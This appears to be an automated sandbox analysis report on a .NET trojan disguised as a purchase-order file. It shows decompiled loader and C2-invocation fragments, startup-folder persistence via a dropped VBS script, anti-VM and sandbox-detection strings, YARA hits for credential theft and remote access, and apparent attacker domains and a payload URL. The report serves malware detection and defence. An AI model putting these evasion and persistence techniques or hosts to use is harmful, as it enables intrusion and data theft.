              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: PO#GREEN AURA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: PO#GREEN AURA.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\System.pdbF source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B37000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Desktop\PO#GREEN AURA.PDBs source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO#GREEN AURA.exe, 00000000.00000002.1843788679.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\user\Desktop\PO#GREEN AURA.PDB source: PO#GREEN AURA.exe, 00000001.00000002.2937883086.00000000008F8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO#GREEN AURA.exe, 00000000.00000002.1843788679.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: n,C:\Windows\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2937883086.00000000008F8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdbh source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B37000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B22000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ##.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2937883086.00000000008F8000.00000004.00000010.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: PO#GREEN AURA.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
              Source: PO#GREEN AURA.exe, Zytiu.cs.Net Code: Dfwsqzgkcr System.AppDomain.Load(byte[])
              Source: Count.exe.0.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
              Source: Count.exe.0.dr, Zytiu.cs.Net Code: Dfwsqzgkcr System.AppDomain.Load(byte[])
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Messages.cs.Net Code: Memory
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 0.2.PO#GREEN AURA.exe.43314f0.5.raw.unpack, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
              Source: 0.2.PO#GREEN AURA.exe.43314f0.5.raw.unpack, Zytiu.cs.Net Code: Dfwsqzgkcr System.AppDomain.Load(byte[])
              Source: 0.2.PO#GREEN AURA.exe.6e90000.10.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 0.2.PO#GREEN AURA.exe.6e90000.10.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 0.2.PO#GREEN AURA.exe.6e90000.10.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 0.2.PO#GREEN AURA.exe.6e90000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 0.2.PO#GREEN AURA.exe.6e90000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: Yara matchFile source: 0.2.PO#GREEN AURA.exe.6580000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO#GREEN AURA.exe.6580000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1842730771.0000000006580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO#GREEN AURA.exe PID: 2136, type: MEMORYSTR
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06EEE448 push es; retf 0_2_06EEE494
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06EECFD1 push es; iretd 0_2_06EECFD4
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06EE4C72 push eax; ret 0_2_06EE4C79
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06EE4C70 pushad ; ret 0_2_06EE4C71
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06F85CF1 push es; ret 0_2_06F85D0C
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06F882C6 push es; retf 0_2_06F8831C
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06F89A71 push es; ret 0_2_06F89A8C
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06F83B98 pushfd ; retf 0_2_06F83B99
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06F8D0FA push eax; retf 0_2_06F8D0FD
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06F84078 push eax; iretd 0_2_06F84079
              Source: 0.2.PO#GREEN AURA.exe.6220000.7.raw.unpack, A9TAnnCsDAfU3Hj52mH.csHigh entropy of concatenated method names: 'LBHCkeyLc7', 'JQACRr1y27', 'mTvCj67Ehp', 've8CUsCXoT', 'iYSC96h8wL', 'mDPCoVvi61', 'LyxC0bHwYk', 'bt6CAceDKX', 'MP8COM5KJl', 'O63CMlpyX8'
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeFile created: C:\Users\user\AppData\Roaming\Count.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbsJump to dropped file
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbsJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbsJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: PO#GREEN AURA.exe PID: 2136, type: MEMORYSTR
              Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeMemory allocated: 1950000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeMemory allocated: 3320000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeMemory allocated: 5320000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeMemory allocated: CA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
              Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
              Source: PO#GREEN AURA.exe, 00000000.00000002.1828695571.000000000160D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, NativeMethods.csReference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, ResourceReferenceValue.csReference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess created: C:\Users\user\Desktop\PO#GREEN AURA.exe "C:\Users\user\Desktop\PO#GREEN AURA.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeQueries volume information: C:\Users\user\Desktop\PO#GREEN AURA.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeQueries volume information: C:\Users\user\Desktop\PO#GREEN AURA.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: PO#GREEN AURA.exe, 00000000.00000002.1843468753.000000000675A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TaskScheduler.EXE

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 1.2.PO#GREEN AURA.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO#GREEN AURA.exe.346f2ac.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO#GREEN AURA.exe PID: 2136, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PO#GREEN AURA.exe PID: 6840, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 1.2.PO#GREEN AURA.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO#GREEN AURA.exe.346f2ac.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO#GREEN AURA.exe PID: 2136, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PO#GREEN AURA.exe PID: 6840, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid Accounts1
              Scheduled Task/Job
              1
              Scripting
              11
              Process Injection
              1
              Masquerading
              OS Credential Dumping221
              Security Software Discovery
              Remote Services11
              Archive Collected Data
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API
              1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              2
              Virtualization/Sandbox Evasion
              LSASS Memory2
              Virtualization/Sandbox Evasion
              Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Registry Run Keys / Startup Folder
              2
              Registry Run Keys / Startup Folder
              1
              Disable or Modify Tools
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Process Injection
              NTDS13
              System Information Discovery
              Distributed Component Object ModelInput Capture12
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
              Obfuscated Files or Information
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Software Packing
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              PO#GREEN AURA.exe32%ReversingLabsByteCode-MSIL.Trojan.Zilla
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\Count.exe32%ReversingLabsByteCode-MSIL.Trojan.Zilla
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://win32.ydns.eu/1/12/panel/uploads/Xlzsats.wav0%Avira URL Cloudsafe
              kingsbkup1.ydns.eu0%Avira URL Cloudsafe
              http://win32.ydns.eu0%Avira URL Cloudsafe
              smfcs3.ydns.eu0%Avira URL Cloudsafe
              smfcs1.ydns.eu0%Avira URL Cloudsafe
              bin12.ydns.eu0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
